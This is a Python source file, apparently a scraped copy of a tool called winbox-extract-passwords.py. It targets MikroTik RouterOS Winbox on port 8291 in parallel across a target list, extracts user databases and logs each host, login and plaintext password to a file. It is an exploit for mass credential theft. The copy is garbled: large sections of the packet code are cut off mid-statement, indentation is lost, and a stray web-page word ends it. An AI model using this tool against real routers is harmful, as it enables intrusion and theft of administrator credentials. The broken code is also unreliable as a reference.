#!/usr/bin/env python3
#https://github.com/jabberd/RouterOS_Tools/blob/master/winbox-extract-passwords.py
import argparse, binascii, struct, hashlib, time
from multiprocessing import Pool
from io import BytesIO
from socket import *
results_filename = 'winbox-extract-passwords.log'
TIMEOUT = 5
SLEEP_TIME = 0.5
# Packet headers
M2_HEADER = b'\x4d\x32'
M2_EXTRA = b'\x01\x00'
# Message protocol types
MT_BOOL = 0x00
MT_BOOL_CODE = {False: 0x00, True: 0x01}
MT_BOOL_VALUE = {0x00: False, 0x01: True}
MT_DWORD = 0x08
MT_BYTE = 0x09
MT_STRING = 0x21
MT_HASH = 0x31
MT_ARRAY = 0x88
# Message protocol constants
MT_RECEIVER = 0xff0001
MT_SENDER = 0xff0002
MT_REPLY_EXPECTED = 0xff0005
MT_REQUEST_ID = 0xff0006
MT_COMMAND = 0xff0007
DEBUG = False
# Global variables
targets = []
number_of_threads = 50
log = False
winbox_port = 8291
# mtPacket
class mtPacket(object):
def __init__(self):
self.contents = []
self.raw = None
self.ready = False
self.parsed = False
def add(self, id, type, value):
self.contents.append((id, type, value))
def build(self):
buf = BytesIO()
for k in self.contents:
id, type, value = k
if type == MT_BOOL:
type = MT_BOOL_CODE[value]
size_bytes = b''
value_bytes = b''
elif type == MT_DWORD:
size_bytes = b''
value_bytes = struct.pack('H', self.raw[2:4])
if data_size + 4 != packet_size:
raise Exception('Packet header size is incorrect!')
block = self.raw[6:]
pointer = 0
block_size = len(block)
while pointer + 4 < block_size:
id, = struct.unpack(' or --targets/-T ')
exit(1)
elif args['target'] and args['targets']:
print('Please specify either --target/-t option, or --targets/-T , but not both')
exit(1)
elif args['target']:
targets.append(args['target'])
number_of_threads = 1
else:
targetsfile = args['targets']
targets = read_targets(targetsfile)
if targets is None:
print('Error reading the targets file: %s' % targetsfile)
exit(1)
targets_count = len(targets)
if targets_count < number_of_threads:
number_of_threads = targets_count
if args['debug']:
DEBUG = True
if args['threads']:
number_of_threads = args['threads']
if args['port']:
winbox_port = args['port']
if args['log']:
log = True
log_filename = args['log']
log_file = open(log_filename, 'a')
print('[*] Starting with %s threads' % number_of_threads)
pool = Pool(processes = int(number_of_threads))
results = pool.map(get_userdat, targets)
pool.close()
pool.join()
print('[!] Finishing...')
for r in results:
if r is not None:
for t in r:
host, login, password = t
out = host + ' ' + login + ' ' + password
if not results_file_opened:
results_file = open(results_filename, 'a')
results_file_opened = True
results_file.write(out + '\n')
if log:
log_file.write(host + '\t' + login + '\t' + password + '\n')
if results_file_opened:
results_file.close()
if log:
log_file.close()
Рубрики